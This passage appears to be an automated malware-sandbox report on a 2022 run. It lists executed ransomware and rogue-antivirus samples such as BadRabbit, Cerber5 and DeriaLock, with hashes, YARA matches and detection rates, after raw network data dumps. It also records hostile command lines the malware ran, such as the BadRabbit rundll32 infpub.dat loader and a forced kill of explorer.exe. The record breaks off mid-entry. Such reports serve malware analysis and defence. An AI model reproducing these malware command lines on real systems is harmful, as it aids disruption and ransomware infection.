                                                                                                                                                2022-09-29 12:51:18 UTC1011INData Raw: 6e fa b8 b4 61 ca 74 9c a2 d0 e7 18 87 66 65 47 48 4b da f8 bb 2d fd 93 4e 9d b1 f6 39 3e 75 68 5c f7 e5 e8 7d 68 4e 84 11 b9 87 be 6b b1 fb 30 39 11 b2 24 1b 2d c8 38 62 64 d9 4a 31 7a f2 81 66 58 09 7a fb 45 57 de 85 77 3b 1f 87 d3 2e f9 f3 33 f2 95 dd 14 01 bd 82 59 3d 02 2c 11 8b c8 b5 ba b3 fe 58 8b 2b 3c 70 cc ed 19 e4 8b 75 4d 5f 52 a3 82 37 54 bb f6 2d 06 7e 25 ac 5f 2a 34 7f 47 c7 19 0e 06 5d fd 72 2a 62 b2 99 f5 40 8d 5c 43 db 3b 4f 0a bb 28 6f a3 a4 be e7 0b c6 95 c4 88 db 69 a9 a2 68 a7 07 79 ae b4 7d 35 c1 78 3d 09 35 fb 6f de 1f e8 82 c2 8e ab 16 68 82 aa 41 51 92 b9 f3 03 e5 bf 7a 7e 92 9b 3c 6f fb 1e 78 64 41 27 55 c5 e6 32 84 0e d4 94 49 5a 91 88 2b cc 59 f8 34 e4 ec 13 86 3e 84 6a ac 76 52 7a c1 84 b3 68 d8 3d 4b 54 98 3e 19 f3 b3 77 cf
                                                                                                                                                Data Ascii: natfeGHK-N9>uh\}hNk09$-8bdJ1zfXzEWw;.3Y=,X+<puM_R7T-~%_*4G]r*b@\C;O(oihy}5x=5ohAQz~<oxdA'U2IZ+Y4>jvRzh=KT>w
                                                                                                                                                2022-09-29 12:51:18 UTC1027INData Raw: 7b 37 ef f6 42 d9 c9 2a 42 ff 02 7d 31 24 af e4 1f 5e 76 23 bf 86 c3 af 69 f7 e9 02 bb a3 85 49 7f 70 26 d4 da e4 4d 70 23 fd 85 9d 1a fc 7a 60 9e 50 e6 74 20 7d fe 68 b1 5f 1e 58 c6 0f 62 31 83 48 ba bb 07 96 47 f0 67 2b ae aa 74 a8 a0 66 60 92 6d c3 70 d6 6b ec 8b 5d 29 00 d0 8a 43 25 b1 49 eb 4d b2 34 26 22 c4 4c a3 e3 63 af f2 b2 22 81 c1 e8 53 0b 89 b8 2b 5e b8 1e 67 4f 27 6e ef 51 c5 bd db 82 a1 b9 82 96 27 a8 d2 31 34 e3 a2 63 1e 23 51 09 77 39 fa 06 d8 d1 33 41 46 e9 93 a0 16 d9 04 5d df 15 d0 13 44 72 2d 18 08 95 25 be c2 e2 4e 7b 4c 8b 9f 4e 49 77 1a 86 8c 7f 63 7c f0 f3 10 0b a4 2a 92 6f 10 46 42 6e 96 e5 56 db e5 c6 33 d4 b3 a0 ac a7 36 a2 8f 8d 44 b0 6b 5c 4a b0 63 73 cf 45 eb af 03 39 06 67 13 7c 5c b6 a1 48 d8 34 97 9e 26 fb 05 48 20 d1 32
                                                                                                                                                Data Ascii: {7B*B}1$^v#iIp&Mp#z`Pt }h_Xb1HGg+tf`mpk])C%IM4&"Lc"S+^gO'nQ'14c#Qw93AF]Dr-%N{LNIwc|*oFBnV36Dk\JcsE9g|\H4&H 2
                                                                                                                                                2022-09-29 12:51:18 UTC1043INData Raw: 61 5c 56 85 15 75 56 0d 28 0a a8 3e e5 91 d0 cd 62 be 20 cf f2 27 2a 72 84 76 12 73 55 fa 5d b2 6c 6d 04 58 8f 9c 31 e3 4d a4 aa f3 6b 73 16 0e ba a1 7a 9b 2e 49 81 ea ce ec 58 7b 88 cb f6 98 43 b5 75 54 e0 2d 1d 64 f8 f6 50 4b 2f f9 fc 59 be d6 6f 06 f6 6c 80 e2 6c 59 5d 76 bd 01 ca a7 28 7c 39 00 8b 07 ad 9e 72 09 f2 e2 fa af c7 fa 86 cc 37 a1 72 aa 8d f9 19 d3 9b 89 39 5a c8 dc 13 89 2f 0d 47 32 93 35 67 47 17 df 64 76 dc cb 44 0c 72 ce 2f ea 1f 3e a9 19 20 b2 95 f5 39 09 25 f8 90 2d e7 1a 8f f4 4e b5 81 cf fb 88 da cf 4b 4d d8 d3 2a 0b cc 5f e8 91 d1 d4 18 c6 81 bb a1 9a 47 87 9b 1c 3a a4 7c 37 a1 fc 31 7c 3f 50 7d b2 38 57 56 f9 18 81 e5 0c 60 5b 17 62 a0 20 98 4c 51 dc fa 20 32 af 70 9b 80 a5 b0 da 1d 51 ae a8 41 42 43 21 18 81 10 10 cd 3e c4 1c 94
                                                                                                                                                Data Ascii: a\VuV(>b '*rvsU]lmX1Mksz.IX{CuT-dPK/YollY]v(|9r7r9Z/G25gGdvDr/> 9%-NKM*_G:|71|?P}8WV`[b LQ 2pQABC!>
                                                                                                                                                2022-09-29 12:51:18 UTC1059INData Raw: 8c fe 89 e4 2b f9 70 2a ff 4e b6 22 b7 de 84 2e 21 f3 4c bd b9 99 07 a1 48 89 9b c1 33 25 01 e2 43 77 35 d2 e6 25 7e be 24 50 ec 49 a7 d6 74 ac e8 20 5b a2 55 45 0b 58 5b 84 bd 06 c6 c0 7a d7 f6 70 8a b9 78 e4 94 35 ee 4f 09 37 4a e7 a9 ba 2c de 19 79 8d 25 1f c8 de 55 7a f7 e5 7a 21 cf e9 f5 34 56 9f e8 db c6 7a e1 54 03 d4 6b 9b 59 03 d7 20 3d 15 b7 74 7a 00 cf 76 4c 46 bf 36 41 7d 56 7b 80 54 7c ef 07 ac 79 5f f9 6d 2b f4 11 d3 25 d0 37 36 0d 5a 5e 54 0e a2 aa ee cc 0e 3f db 50 6a 9e 43 ba 4c 11 e2 83 9f a9 b8 4c 25 aa 7a 60 8b 5c 6e 5e 7c 4a 0b 2f f2 7c 2d 59 e1 28 9a ab 30 10 ed 78 f9 12 02 0d 0d fd f8 e3 df 3b 0b 33 59 54 ed 98 c7 ce a0 bc 83 7d 76 5b 4a 50 5a f2 a9 6d 92 4e be 0f 8e 72 ab fe 7f b3 45 41 58 77 2b 5e 84 6f c8 d8 a5 6d 52 1d 26 10 11
                                                                                                                                                Data Ascii: +p*N".!LH3%Cw5%~$PIt [UEX[zpx5O7J,y%Uzz!4VzTkY =tzvLF6A}V{T|y_m+%76Z^T?PjCLL%z`\n^|J/|-Y(0x;3YT}v[JPZmNrEAXw+^omR&
                                                                                                                                                2022-09-29 12:51:18 UTC1075INData Raw: 6b d5 a8 7c 2f 7e 0e 46 3f 5e ce 1f a3 5e 1b e0 6e 4a 8d 5b 57 74 c5 16 e4 e4 aa 20 45 9a 25 86 64 ce 6e bb 65 85 d2 f6 ac d0 e3 54 cf bb b2 80 07 e8 94 28 f1 00 57 b3 a3 a7 9f 07 88 d2 94 90 38 f7 4c 66 af 43 cd f3 64 25 28 73 27 9b 7c be 6f d9 a1 91 a5 ce 8c a8 d3 63 d5 51 40 e3 1a 59 64 1e 9f 40 f1 9d 5d d3 95 61 45 03 f3 c3 3e 0d 6d 2c b0 17 78 7d 39 16 0f 3e b7 16 a5 fa 17 09 44 d8 e9 e1 09 0a 87 ef 9d b2 de 6e 16 74 82 97 ad 08 03 e1 77 bc aa fc 85 d9 bb a4 f7 9f 96 67 e0 22 d1 77 43 14 81 ed 61 8f 13 aa a0 9b e3 4b 0d c4 38 78 ec 8d bf 7f e0 ba 63 37 93 b4 be 1d c2 6c 65 71 e7 a7 8a 10 2b 36 30 46 e2 8d 4a 79 4c 9f 09 a6 d1 bd 89 57 0c 03 d9 de 6b 97 c9 02 48 cf 2d c6 b9 77 c9 d7 6b 52 0c 0a 2f 9b a2 3b 0a 6a 74 96 b7 1a 16 cd 05 d0 5f 3c f9 f1 75
                                                                                                                                                Data Ascii: k|/~F?^^nJ[Wt E%dneT(W8LfCd%(s'|ocQ@Yd@]aE>m,x}9>Dntwg"wCaK8xc7leq+60FJyLWkH-wkR/;jt_<u
                                                                                                                                                2022-09-29 12:51:18 UTC1091INData Raw: ee c8 2c b0 ea eb 54 54 19 e5 26 0c 7b 5d 9f 97 86 2e 93 32 e4 35 a7 13 b5 7d c3 72 15 68 c0 31 75 eb e8 e5 a4 1c aa 5e fa c2 9e 0a e7 2e 95 6f 23 5f 5a aa d3 6a 70 11 a3 71 0c be ab af 17 53 cf d7 1b bf 1d 85 f5 51 34 66 32 ed 3a 8c 57 8f bb d3 60 60 21 50 73 c6 d2 12 65 a5 1e 09 2e 32 35 e5 62 70 b9 64 b2 56 95 dc 09 19 87 e6 ad 81 fa 25 98 10 00 8f ce 56 e6 39 c5 c9 3c a9 d4 39 e5 d9 a8 ed f7 d7 2a 12 05 54 f0 12 3e 8e c5 cf d4 06 c3 35 9a 9e b0 12 68 fe 51 76 8a c4 bd bd 13 47 7e 93 0f 6f d3 20 2c bc 3d 09 1f 13 5d 69 12 1c 67 6d 26 99 93 e8 e4 14 e4 12 8f eb d3 d6 76 14 e3 ad 43 81 90 8e f9 87 04 33 83 f6 7d 55 67 f0 ef 5f d1 56 fa d0 39 b6 f5 ec 03 6a 88 c8 29 10 4b 12 a3 dd 66 1b d9 d4 5c 4c 45 12 d7 dc 31 f6 d6 bf 94 29 09 83 59 4d e7 40 0b 94 d6
                                                                                                                                                Data Ascii: ,TT&{].25}rh1u^.o#_ZjpqSQ4f2:W``!Pse.25bpdV%V9<9*T>5hQvG~o ,=]igm&vC3}Ug_V9j)Kf\LE1)YM@
                                                                                                                                                2022-09-29 12:51:18 UTC1107INData Raw: 4b 8d cd fe 11 d2 6f 92 44 9c 02 47 4e 1b ed c1 63 0b 57 90 24 e5 3c 9d bc 23 d3 14 4f d5 54 d1 46 82 fb 73 88 b5 ce 15 eb 6f a1 10 b2 a5 a2 98 76 69 d4 e0 33 04 bc e2 ba 44 87 53 fa c6 02 96 ad 7e 25 24 3e 27 ff ac 19 4c cc b4 38 db 57 b7 3f ee 38 92 4c bd 7a 6d e1 37 4f 62 d6 40 0e 9d a9 9e 39 cd b1 22 62 af 22 d5 6a 20 e6 84 10 8d 01 c1 50 f2 a6 e4 fa 0a ec 68 45 63 fe e2 0a c5 17 38 18 8b 13 02 8b 8e e8 84 5a c0 89 0b 2a 67 d2 1f b5 e3 46 1a 9d 98 0f a5 9e 1a 56 c6 17 a1 7a 1c a2 04 75 41 23 59 ff cc 07 bc 2f 4e 74 7e 7a 01 98 a2 4a 15 b9 ab 74 ff c6 60 2e 26 50 5e 78 62 0f 83 0d a4 fd 1f fe e3 e1 4e 53 e1 87 44 b0 b0 86 d8 d4 3b 91 9e a7 cc 3a 27 54 b6 bd 57 d0 96 05 06 aa 46 fe 7f 8b 73 05 d2 ba 7d 65 77 ca ae c7 35 8b 1b 83 99 15 36 bf 18 26 ec 95
                                                                                                                                                Data Ascii: KoDGNcW$<#OTFsovi3DS~%$>'L8W?8Lzm7Ob@9"b"j PhEc8Z*gFVzuA#Y/Nt~zJt`.&P^xbNSD;:'TWFs}ew56&


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:14:51:04
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\Desktop\4d44bed6.exe"
                                                                                                                                                Imagebase:0x1d6d1910000
                                                                                                                                                File size:151552 bytes
                                                                                                                                                MD5 hash:F7FAD376E883D2BAB82FBAE91E5874F5
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:14:52:04
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\Desktop\4d44bed6.exe"
                                                                                                                                                Imagebase:0x16c6b950000
                                                                                                                                                File size:151552 bytes
                                                                                                                                                MD5 hash:F7FAD376E883D2BAB82FBAE91E5874F5
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:14:52:04
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@Antivirus.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:2066944 bytes
                                                                                                                                                MD5 hash:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 86%, ReversingLabs
                                                                                                                                                • Detection: 60%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:14:52:08
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:757637 bytes
                                                                                                                                                MD5 hash:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 78%, ReversingLabs
                                                                                                                                                • Detection: 28%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:14:52:08
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:835669 bytes
                                                                                                                                                MD5 hash:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.534359527.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                • Detection: 64%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:14:52:12
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\302746537.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\WINDOWS\302746537.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:22528 bytes
                                                                                                                                                MD5 hash:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:14:52:12
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1227610 bytes
                                                                                                                                                MD5 hash:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 68%, ReversingLabs
                                                                                                                                                • Detection: 24%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:14:52:15
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" "
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:14:52:15
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:14:52:15
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
                                                                                                                                                Imagebase:0x80000
                                                                                                                                                File size:441899 bytes
                                                                                                                                                MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 93%, ReversingLabs
                                                                                                                                                • Detection: 83%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:14:52:16
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:regsvr32 /s c:\windows\comctl32.ocx
                                                                                                                                                Imagebase:0xee0000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:14:52:18
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@Birele.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:119296 bytes
                                                                                                                                                MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 86%, ReversingLabs
                                                                                                                                                • Detection: 78%, Metadefender, Browse
                                                                                                                                                Reputation:low

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:14:52:20
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:14:52:22
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                Imagebase:0x120000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:14:52:22
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@Cerber5.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:320760 bytes
                                                                                                                                                MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 00000010.00000000.472305504.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 00000010.00000000.476993262.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 00000010.00000002.571550641.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 00000010.00000002.594076682.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 00000010.00000000.470696934.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: Cerber, Description: Cerber Payload, Source: 00000010.00000002.548613224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: 00000010.00000000.474988219.0000000000448000.00000020.00000001.01000000.00000014.sdmp, Author: pekeinfo
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 91%, ReversingLabs
                                                                                                                                                • Detection: 76%, Metadefender, Browse

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:14:52:24
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                Imagebase:0x320000
                                                                                                                                                File size:74752 bytes
                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:14:52:24
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:14:52:25
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:regsvr32 /s c:\windows\mscomctl.ocx
                                                                                                                                                Imagebase:0xee0000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:14:52:25
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0x11d0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:14:52:26
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                File size:495616 bytes
                                                                                                                                                MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 00000016.00000000.479761839.0000000000D56000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                • Detection: 69%, Metadefender, Browse

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:14:52:27
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7fcd70000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:14:52:28
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                                                                Imagebase:0x1170000
                                                                                                                                                File size:185856 bytes
                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:14:52:28
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:9421312 bytes
                                                                                                                                                MD5 hash:C18A7323332B3292A8E0F1C81DF65698
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 62%, ReversingLabs
                                                                                                                                                • Detection: 56%, Metadefender, Browse

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:14:52:28
                                                                                                                                                Start date:29/09/2022
                                                                                                                                                Path:C:\Windows\antivirus-platinum.exe
